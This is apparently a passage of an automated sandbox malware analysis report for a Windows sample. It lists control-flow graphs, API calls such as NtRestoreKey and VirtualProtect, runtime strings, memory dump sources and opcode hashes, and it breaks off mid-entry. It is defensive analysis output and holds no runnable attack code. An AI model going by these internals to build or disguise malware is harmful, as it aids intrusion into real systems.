7ff6880c1394 3024 7ff6880c9950 3020->3024 3022 7ff6880c13b8 3023 7ff6880c13c6 NtRestoreKey 3022->3023 3025 7ff6880c996e 3024->3025 3028 7ff6880c999b 3024->3028 3025->3022 3026 7ff6880c9a43 3027 7ff6880c9a5f malloc 3026->3027 3029 7ff6880c9a80 3027->3029 3028->3025 3028->3026 3029->3025 3029->3029 3030 7ff6880c11d8 3031 7ff6880c11fa 3030->3031 3032 7ff6880c1201 _initterm 3031->3032 3033 7ff6880c121a 3031->3033 3032->3033 3043 7ff6880c1880 3033->3043 3036 7ff6880c126a 3037 7ff6880c126f malloc 3036->3037 3038 7ff6880c128b 3037->3038 3039 7ff6880c12a0 strlen malloc memcpy 3038->3039 3039->3039 3040 7ff6880c12d0 3039->3040 3041 7ff6880c1338 3040->3041 3042 7ff6880c132d _cexit 3040->3042 3042->3041 3044 7ff6880c1247 SetUnhandledExceptionFilter 3043->3044 3045 7ff6880c18a2 3043->3045 3044->3036 3045->3044 3046 7ff6880c194d 3045->3046 3051 7ff6880c1a20 3045->3051 3047 7ff6880c199e 3046->3047 3048 7ff6880c1956 3046->3048 3047->3044 3050 7ff6880c19e9 VirtualProtect 3047->3050 3048->3047 3056 7ff6880c1ba0 3048->3056 3050->3047 3051->3047 3052 7ff6880c1b5c 3051->3052 3053 7ff6880c1b36 3051->3053 3054 7ff6880c1ba0 4 API calls 3053->3054 3055 7ff6880c1b53 3054->3055 3055->3052 3058 7ff6880c1bc2 3056->3058 3059 7ff6880c1c45 VirtualQuery 3058->3059 3060 7ff6880c1cf4 3058->3060 3064 7ff6880c1c04 memcpy 3058->3064 3059->3060 3065 7ff6880c1c72 3059->3065 3061 7ff6880c1d23 GetLastError 3060->3061 3063 7ff6880c1d37 3061->3063 3062 7ff6880c1ca4 VirtualProtect 3062->3061 3062->3064 3064->3048 3065->3062 3065->3064

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                    • String ID: &${*
                                                                    • API String ID: 2643109117-3993786024
                                                                    • Opcode ID: 385138cb4b144457da38e36a076bb96dc8da28c29ddbb302a2a9c00a1c84f8af
                                                                    • Instruction ID: 3078510eddc25f8d3e0c9b5f26926735226596e4fd5221edc6c3d1f1a11a4f49
                                                                    • Opcode Fuzzy Hash: 385138cb4b144457da38e36a076bb96dc8da28c29ddbb302a2a9c00a1c84f8af
                                                                    • Instruction Fuzzy Hash: 6D412365A09A02C6FB51AFB5E9543B923A2BF99781F444039C90DC77E7DE2CE851C328

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • NtRestoreKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6880C1156), ref: 00007FF6880C13F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: Restore
                                                                    • String ID:
                                                                    • API String ID: 1214912099-0
                                                                    • Opcode ID: ef416661b0ae50f477c3474d23bd773f196fc4003a84255f99ed7cebba33c335
                                                                    • Instruction ID: 3bd69cc9a030ae8f335a941b627fcf73d0bcbe88836855a1b903dd35591026a2
                                                                    • Opcode Fuzzy Hash: ef416661b0ae50f477c3474d23bd773f196fc4003a84255f99ed7cebba33c335
                                                                    • Instruction Fuzzy Hash: 48F0E77290CB42C2D610CF61F85022A77A2FF88384B11583DEA8C837A6CF3CE050CB69

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                    • String ID: &${*
                                                                    • API String ID: 3825114775-3993786024
                                                                    • Opcode ID: 593211548d2641e5e7df01e0c417a90f6472c82e1830f04aa1cd8e0ff98b8616
                                                                    • Instruction ID: 77ad60075f36825f5fa7c34975c2d9c11ae70a55254c2eb868a1ce8b60d38c09
                                                                    • Opcode Fuzzy Hash: 593211548d2641e5e7df01e0c417a90f6472c82e1830f04aa1cd8e0ff98b8616
                                                                    • Instruction Fuzzy Hash: 0B411265A18A02C1F711AFB5E9543B923A2BF54785F44403AC94DC7BE7DF6CE851C328

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 42 7ff6880c6790-7ff6880c6797 43 7ff6880c679d-7ff6880c6883 42->43 44 7ff6880c688a-7ff6880c68d7 call 7ff6880c3c20 42->44 43->44 48 7ff6880c6920-7ff6880c6945 wcslen 44->48 49 7ff6880c68d9-7ff6880c6919 44->49 51 7ff6880c6950-7ff6880c6960 _wcsnicmp 48->51 49->48 52 7ff6880c6966-7ff6880c697a wcslen 51->52 53 7ff6880c6a6a 51->53 52->51 54 7ff6880c697c 52->54 55 7ff6880c6a6e-7ff6880c6a82 53->55 54->55 57 7ff6880c6a84-7ff6880c6ae0 55->57 58 7ff6880c6ae7-7ff6880c6b9c memset wcscpy wcscat call 7ff6880c2f70 call 7ff6880c3350 call 7ff6880c14c7 memset 55->58 57->58 65 7ff6880c7dd1-7ff6880c7e13 call 7ff6880c1370 58->65 66 7ff6880c6ba2-7ff6880c6ba9 58->66 69 7ff6880c6bab-7ff6880c6beb 65->69 73 7ff6880c7e19 65->73 68 7ff6880c6bf2-7ff6880c6c02 wcslen 66->68 66->69 71 7ff6880c6c04-7ff6880c6c0e 68->71 72 7ff6880c6c39-7ff6880c6c3b 68->72 69->68 74 7ff6880c6c10-7ff6880c6c20 _wcsnicmp 71->74 75 7ff6880c6c41-7ff6880c6c6b wcscat memset 72->75 73->68 76 7ff6880c6c22-7ff6880c6c35 wcslen 74->76 77 7ff6880c6c3d 74->77 78 7ff6880c6c71-7ff6880c6c78 75->78 79 7ff6880c7e1e-7ff6880c7e60 call 7ff6880c1370 75->79 76->74 81 7ff6880c6c37 76->81 77->75 82 7ff6880c6cc1-7ff6880c6cf0 wcscpy wcscat 78->82 83 7ff6880c6c7a-7ff6880c6cba 78->83 79->83 89 7ff6880c7e66 79->89 81->75 84 7ff6880c6cf6-7ff6880c6cfd 82->84 85 7ff6880c7e6b-7ff6880c7e91 call 7ff6880c9740 call 7ff6880c1370 82->85 83->82 87 7ff6880c6db4-7ff6880c6dbb 84->87 88 7ff6880c6d03-7ff6880c6dad 84->88 85->88 106 7ff6880c7e97 85->106 91 7ff6880c6dc1-7ff6880c6dc8 87->91 92 7ff6880c7e9c-7ff6880c7ee0 call 7ff6880c1370 87->92 88->87 89->82 95 7ff6880c6e26-7ff6880c6e2d 91->95 96 7ff6880c6dca-7ff6880c6e1f 91->96 92->96 102 7ff6880c7ee6 92->102 99 7ff6880c6e33-7ff6880c6e3a 95->99 100 7ff6880c7eeb-7ff6880c7f25 memcpy call 7ff6880c1370 95->100 96->95 104 7ff6880c6e40-7ff6880c6e5c 99->104 105 7ff6880c6eef-7ff6880c6f5e call 7ff6880c3c20 call 7ff6880c145e 99->105 100->104 110 7ff6880c7f2b 100->110 102->95 108 7ff6880c6e60-7ff6880c6e8e 104->108 106->87 111 7ff6880c6e90-7ff6880c6eba 108->111 112 7ff6880c6ebc-7ff6880c6ee8 108->112 110->105 111->108 112->105
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$_wcsnicmpwcscatwcscpy
                                                                    • String ID: X&
                                                                    • API String ID: 525299370-221892188
                                                                    • Opcode ID: a9a036b2fccb0bffa557323bd205af2e261faba0a7a8b564e3024caf51401c41
                                                                    • Instruction ID: 4760faab4706e3bcf85c0e5c5d5b395fd87a621cabf084aad2fbbe9b3663ea13
                                                                    • Opcode Fuzzy Hash: a9a036b2fccb0bffa557323bd205af2e261faba0a7a8b564e3024caf51401c41
                                                                    • Instruction Fuzzy Hash: 10226B65C2D683C6F712AFB9E8412B46B61BF91744F08423DD98DD66E2EF2CA245C31C

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscatwcscpywcslen
                                                                    • String ID: $0$0$@$@
                                                                    • API String ID: 4263182637-1413854666
                                                                    • Opcode ID: 53da9dd5fe03df7749d5368ee7ee60914f886c17cc3be08b42a408210f1a05b0
                                                                    • Instruction ID: 20419df55d7c5b885c654df25346669923f29c56a1fe37472bf0e8c87d29d439
                                                                    • Opcode Fuzzy Hash: 53da9dd5fe03df7749d5368ee7ee60914f886c17cc3be08b42a408210f1a05b0
                                                                    • Instruction Fuzzy Hash: 79B1AE6291C6C2C6F3219F75E4053AA77B1FF80748F044239EA8C966A6DF7CE149CB58

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                    • String ID: 0$X$`
                                                                    • API String ID: 329590056-2527496196
                                                                    • Opcode ID: 1367f86378d13e6249d5f239218ccb32a66bc86646381168925fa02af27368da
                                                                    • Instruction ID: 57e59b4db19a0981c0c0907a086748f0a0adfb9be9ed45f70292e3d5c0e21c04
                                                                    • Opcode Fuzzy Hash: 1367f86378d13e6249d5f239218ccb32a66bc86646381168925fa02af27368da
                                                                    • Instruction Fuzzy Hash: AC02BE32908B81C2E7609F69E8053AA77A1FF857A4F044239DA9C87BE6DF3CD145C758

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,?,?,00007FF6880CB7AC,00007FF6880CB7AC,?,?,00007FF6880C0000,?,00007FF6880C1991), ref: 00007FF6880C1C63
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00007FF6880CB7AC,00007FF6880CB7AC,?,?,00007FF6880C0000,?,00007FF6880C1991), ref: 00007FF6880C1CC7
                                                                    • memcpy.MSVCRT ref: 00007FF6880C1CE0
                                                                    • GetLastError.KERNEL32(?,?,?,?,00007FF6880CB7AC,00007FF6880CB7AC,?,?,00007FF6880C0000,?,00007FF6880C1991), ref: 00007FF6880C1D23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                    • API String ID: 2595394609-2123141913
                                                                    • Opcode ID: 45b11c7b96de9d61924da4bdc5ecca7e23204424f414426a2fc417c111c69661
                                                                    • Instruction ID: c77f9037e17ef4358867e12ce8975fb8fb7ded2bfeb587f834c9480a379d1c47
                                                                    • Opcode Fuzzy Hash: 45b11c7b96de9d61924da4bdc5ecca7e23204424f414426a2fc417c111c69661
                                                                    • Instruction Fuzzy Hash: 00419F71A08A46C2EB109F65E8846B82762FF85B81F54403ADE0DC37E7DE3CE585C728

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                    • String ID:
                                                                    • API String ID: 3326252324-0
                                                                    • Opcode ID: 965d46179bfd094fd32f4ef9d5af756bb0da220d1805e035f603a074db3337d7
                                                                    • Instruction ID: fd9d5b653996d55cbb89b7b39b0197a7b40568ee472fbe2333f3aaa9d38d077f
                                                                    • Opcode Fuzzy Hash: 965d46179bfd094fd32f4ef9d5af756bb0da220d1805e035f603a074db3337d7
                                                                    • Instruction Fuzzy Hash: 0121FC24E19902D6FA19AF71E9503782362BF50B91F58003DC91DD7EEADF2CE956C328

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 281 7ff6880c1e10-7ff6880c1e2d 282 7ff6880c1e2f-7ff6880c1e38 281->282 283 7ff6880c1e3e-7ff6880c1e48 281->283 282->283 284 7ff6880c1f60-7ff6880c1f69 282->284 285 7ff6880c1ea3-7ff6880c1ea8 283->285 286 7ff6880c1e4a-7ff6880c1e53 283->286 285->284 289 7ff6880c1eae-7ff6880c1eb3 285->289 287 7ff6880c1e55-7ff6880c1e60 286->287 288 7ff6880c1ecc-7ff6880c1ed1 286->288 287->285 292 7ff6880c1f23-7ff6880c1f2d 288->292 293 7ff6880c1ed3-7ff6880c1ee2 signal 288->293 290 7ff6880c1eb5-7ff6880c1eba 289->290 291 7ff6880c1efb-7ff6880c1f0a call 7ff6880c9ef0 289->291 290->284 296 7ff6880c1ec0 290->296 291->292 303 7ff6880c1f0c-7ff6880c1f10 291->303 294 7ff6880c1f2f-7ff6880c1f3f 292->294 295 7ff6880c1f43-7ff6880c1f45 292->295 293->292 297 7ff6880c1ee4-7ff6880c1ee8 293->297 302 7ff6880c1f5a 294->302 295->284 296->292 299 7ff6880c1f4e-7ff6880c1f53 297->299 300 7ff6880c1eea-7ff6880c1ef9 signal 297->300 299->302 300->284 302->284 304 7ff6880c1f55 303->304 305 7ff6880c1f12-7ff6880c1f21 signal 303->305 304->302 305->284 305->292
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CCG
                                                                    • API String ID: 0-1584390748
                                                                    • Opcode ID: c7dd1b12a8f86e9c939c86805264989c4934cfd42abad53a8de843c27f745bc3
                                                                    • Instruction ID: 4a8dde3979b99b903ed99c0f289eaf7ce8831368300f2eb384fd9b8799683236
                                                                    • Opcode Fuzzy Hash: c7dd1b12a8f86e9c939c86805264989c4934cfd42abad53a8de843c27f745bc3
                                                                    • Instruction Fuzzy Hash: EF218161E0C106C2FB755EB495903791183BF89766F28853EE91DC33D6DE6CEC82C269

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen
                                                                    • String ID: 0$@
                                                                    • API String ID: 4088430540-1545510068
                                                                    • Opcode ID: 133498ee64f7adbd6e78beab45bf08e8a131ce13eee2b31ff79bcdc99f4c26c8
                                                                    • Instruction ID: 009be5bc604784a2fa69a10bb90bd4cf670fce17f6132caac32cecf3cb4866d9
                                                                    • Opcode Fuzzy Hash: 133498ee64f7adbd6e78beab45bf08e8a131ce13eee2b31ff79bcdc99f4c26c8
                                                                    • Instruction Fuzzy Hash: 73114A22528681C2E3109F64F44579AA375FFD4394F505128F68982AA9EF7DC146CB14

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 314 7ff6880c1880-7ff6880c189c 315 7ff6880c1a0f-7ff6880c1a1f 314->315 316 7ff6880c18a2-7ff6880c18f9 call 7ff6880c2420 call 7ff6880c2660 314->316 316->315 321 7ff6880c18ff-7ff6880c1910 316->321 322 7ff6880c193e-7ff6880c1941 321->322 323 7ff6880c1912-7ff6880c191c 321->323 324 7ff6880c1943-7ff6880c1947 322->324 325 7ff6880c194d-7ff6880c1954 322->325 323->325 326 7ff6880c191e-7ff6880c1929 323->326 324->325 328 7ff6880c1a20-7ff6880c1a26 324->328 329 7ff6880c199e-7ff6880c19a6 325->329 330 7ff6880c1956-7ff6880c1961 325->330 326->325 327 7ff6880c192b-7ff6880c193a 326->327 327->322 333 7ff6880c1b87-7ff6880c1b98 call 7ff6880c1d40 328->333 334 7ff6880c1a2c-7ff6880c1a37 328->334 329->315 332 7ff6880c19a8-7ff6880c19c1 329->332 331 7ff6880c1970-7ff6880c199c call 7ff6880c1ba0 330->331 331->329 338 7ff6880c19df-7ff6880c19e7 332->338 334->329 335 7ff6880c1a3d-7ff6880c1a5f 334->335 339 7ff6880c1a7d-7ff6880c1a97 335->339 342 7ff6880c19d0-7ff6880c19dd 338->342 343 7ff6880c19e9-7ff6880c1a0d VirtualProtect 338->343 344 7ff6880c1b74-7ff6880c1b82 call 7ff6880c1d40 339->344 345 7ff6880c1a9d-7ff6880c1afa 339->345 342->315 342->338 343->342 344->333 351 7ff6880c1b22-7ff6880c1b26 345->351 352 7ff6880c1afc-7ff6880c1b0e 345->352 355 7ff6880c1a70-7ff6880c1a77 351->355 356 7ff6880c1b2c-7ff6880c1b30 351->356 353 7ff6880c1b10-7ff6880c1b20 352->353 354 7ff6880c1b5c-7ff6880c1b6c 352->354 353->351 353->354 354->344 357 7ff6880c1b6f call 7ff6880c1d40 354->357 355->329 355->339 356->355 358 7ff6880c1b36-7ff6880c1b53 call 7ff6880c1ba0 356->358 357->344 358->354
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6880C1247), ref: 00007FF6880C19F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                    • API String ID: 544645111-395989641
                                                                    • Opcode ID: 178236622e18bfdc7cbd0492b3c825996c37cce24ac31dfacb8cd4114762312e
                                                                    • Instruction ID: 03556a3474686fee90b799db84f02628d099d5a4de313289f17405ab70463a33
                                                                    • Opcode Fuzzy Hash: 178236622e18bfdc7cbd0492b3c825996c37cce24ac31dfacb8cd4114762312e
                                                                    • Instruction Fuzzy Hash: A9516762E08546C6EB109F36E9457B82762FF04BA5F084139D91D877EACF3CE586C728

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 361 7ff6880c1800-7ff6880c1810 362 7ff6880c1824 361->362 363 7ff6880c1812-7ff6880c1822 361->363 364 7ff6880c182b-7ff6880c1867 call 7ff6880c2290 fprintf 362->364 363->364
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-3474627141
                                                                    • Opcode ID: a44f12ad135a22f97608606533fe7126ffd357917123931733c1ac1fccfa0826
